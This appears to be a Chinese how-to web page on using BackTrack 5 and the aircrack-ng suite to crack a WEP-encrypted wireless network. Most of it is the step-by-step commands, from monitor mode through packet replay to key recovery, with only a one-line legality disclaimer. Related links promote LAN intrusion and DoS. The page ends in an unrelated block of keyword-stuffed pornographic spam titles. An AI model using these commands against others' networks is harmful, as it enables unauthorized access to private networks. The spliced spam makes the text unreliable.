• <output id="aynwq"><form id="aynwq"><code id="aynwq"></code></form></output>

    <mark id="aynwq"><option id="aynwq"></option></mark>
  • <mark id="aynwq"><option id="aynwq"></option></mark><label id="aynwq"><dl id="aynwq"></dl></label>
  • 學(xué)習(xí)啦>學(xué)習(xí)電腦>網(wǎng)絡(luò)知識(shí)>局域網(wǎng)知識(shí)>

    backtrack5怎么入侵局域網(wǎng)

    時(shí)間: 本達(dá)868 分享

    Backtrack一直都被當(dāng)作WEP密碼解除的首選系統(tǒng), BackTrack 5和之前的BackTrack 3和BackTrack 4一樣集成了解除無(wú)線密碼的工具并且支持更多型號(hào)的網(wǎng)卡. 3分鐘解除一個(gè)用WEP加密方式的無(wú)線網(wǎng)絡(luò)用BackTrack 5是完全可能的.下面是學(xué)習(xí)啦小編給大家整理的一些有關(guān)backtrack5入侵局域網(wǎng)教程,希望對(duì)大家有幫助!

    backtrack5入侵局域網(wǎng)教程

    非法解除他人的無(wú)線網(wǎng)絡(luò)等同犯罪, 請(qǐng)以自己的無(wú)線網(wǎng)絡(luò)作為實(shí)驗(yàn)環(huán)境.

    首先, 需要準(zhǔn)備:

    1.BackTrack 5 光盤版或者虛擬機(jī)鏡像, 也可以是Backtrack5 U盤版

    2.一個(gè)兼容Backtrack的無(wú)線網(wǎng)卡

    3.使用WEP加密的無(wú)線網(wǎng)絡(luò)加入點(diǎn)(指的就是你要解除的無(wú)線網(wǎng)絡(luò))

    點(diǎn)擊進(jìn)入Backtrack5系統(tǒng)下載

    需要的全部指令:

    (請(qǐng)根據(jù)實(shí)際情況替換粗體部分)

    1) ifconfig -a

    (可以查看到自己機(jī)子無(wú)線網(wǎng)卡的MAC地址和無(wú)線網(wǎng)卡的設(shè)備名稱), 保留這個(gè)窗口方便下幾步查看需要的信息, 打開(kāi)新命令窗口進(jìn)入一步)

    2) airmon-ng start wlan0 2

    (wlan0為無(wú)線網(wǎng)卡, 2為需要監(jiān)聽(tīng)的頻道, 根據(jù)自己情況輸入, 此步驟為打開(kāi)無(wú)線網(wǎng)卡的監(jiān)聽(tīng)模式)

    3) airodump-ng –ivs -w name -c 2 wlan0

    (獲取頻道2的所有無(wú)線AP的信息, wlan0是無(wú)線網(wǎng)卡, 2為頻道, 這一步的頻道需要跟上一步的一致, 命令輸入后會(huì)顯示周圍所有頻道為*的無(wú)線AP,

    顯示的列表:

    BSSID : 無(wú)線AP的Mac 地址

    PWR: AP信號(hào)的大小

    RXQ: 干擾值

    Beacons:發(fā)送和接受的數(shù)據(jù)包, 有數(shù)據(jù)傳輸?shù)臅r(shí)候就會(huì)跳動(dòng)

    #Data: 數(shù)據(jù), 解除需要的最關(guān)鍵的就是這個(gè)

    CH:頻道

    MB:網(wǎng)絡(luò)連接速度

    ESSID: AP的名稱

    保留這一窗口, 打開(kāi)新的命令窗口進(jìn)入下一步)

    4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wlan0

    (發(fā)送欺騙, ap_essid為AP的名稱, 例如Linksys或者TP-Link, ap_mac為AP的MAC地址, 第三步的BSSID就是AP的MAC地址, XXXXXXXXX為自己無(wú)線網(wǎng)卡的MAC地址, 第一步可以看到. 這一步成功后會(huì)顯示Successful, 如不成功需要在信號(hào)強(qiáng)的地方重試, 成功后才可以進(jìn)入下一步)

    5) aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 wlan0

    (ap_mac為無(wú)線AP的mac地址, 具體看步驟3, XXXXXXXX為無(wú)線網(wǎng)卡的mac地址, wlan0為網(wǎng)卡, 這一步執(zhí)行以后, 開(kāi)始正確的收發(fā)數(shù)據(jù)包, #Data開(kāi)始上漲)

    6) aircrack-ng -n 64 -b ap_mac name-*.ivs

    (開(kāi)始解除, ap_mac為ap的mac地址, 64指的是使用了64位加密, 多次解除失敗的話可以試128)

    多數(shù)情況下當(dāng)#data開(kāi)始迅速跳動(dòng)的時(shí)候就可以開(kāi)始解除了, 不需要等到多少包, 如果#data這個(gè)數(shù)據(jù)增長(zhǎng)緩慢的話, 換個(gè)位置到無(wú)線信號(hào)強(qiáng)的地方再試, 命令輸入正確的話最快3分鐘搞定一個(gè)64位加密的WEP AP是沒(méi)問(wèn)題的! e網(wǎng)軟摘測(cè)試時(shí)用的USB網(wǎng)卡, 如果使用內(nèi)置無(wú)線網(wǎng)卡性能上會(huì)提升很多.

    看了“backtrack5怎么入侵局域網(wǎng)”的人還看了

    1.局域網(wǎng)入侵如何做到的

    2.怎樣入侵局域網(wǎng)電腦

    3.局域網(wǎng)內(nèi)部入侵怎么防止

    4.怎樣用局域網(wǎng)強(qiáng)制控制別人電腦

    5.教你如何搶掉局域網(wǎng)內(nèi)所有IP

    6.局域網(wǎng)怎么進(jìn)入別人電腦(2)

    7.局域網(wǎng)內(nèi)如何保證局域網(wǎng)的安全

    8.怎么Dos入侵

    9.淺談局域網(wǎng)安全十大威脅

    10.怎么禁止局域網(wǎng)用戶訪問(wèn)電腦的幾個(gè)辦法

    1467204 主站蜘蛛池模板: 老头猛挺进小莹的体内小说全集| ?1000部又爽又黄无遮挡的视频| 美女爽到尿喷出来| 成人免费观看网欧美片| 农民工嫖妓50岁老熟女| eeuss影院免费直达入口| 欧美色视频在线| 国产精品一区在线观看你懂的| 久久青青草原亚洲av无码麻豆 | 国产精品高清全国免费观看| 亚洲免费一级视频| 韩国公和熄三级在线观看| 成人麻豆日韩在无码视频| 人人澡人人澡人人澡| 最色网在线观看| 日本少妇高潮喷水xxxxxxx| 冲田杏梨在线中文字幕全集| 99re九精品视频在线视频| 最近更新的2019免费国语电影| 国产中文字幕在线观看视频| www国色天香| 欧美人妻aⅴ中文字幕| 国产小视频免费观看| 东京热加勒比无码少妇| 欧美福利在线观看| 国产卡一卡二卡3卡乱码免费| 一级做a爱片就在线看| 欧美日本国产VA高清CABAL| 国产在线无码视频一区二区三区 | 黄网站色视频免费观看| 性高湖久久久久久久久aaaaa| 亚洲欧美日韩国产精品一区二区| 黑人大长吊大战中国人妻 | 欧美大陆日韩一区二区三区| 国产乱子伦在线观看| chinese帅哥18kt| 明星造梦一区二区| 免费观看激色视频网站(性色)| 色播在线永久免费视频网站| 按摩xxxx全套| 亚洲欧洲精品成人久久曰|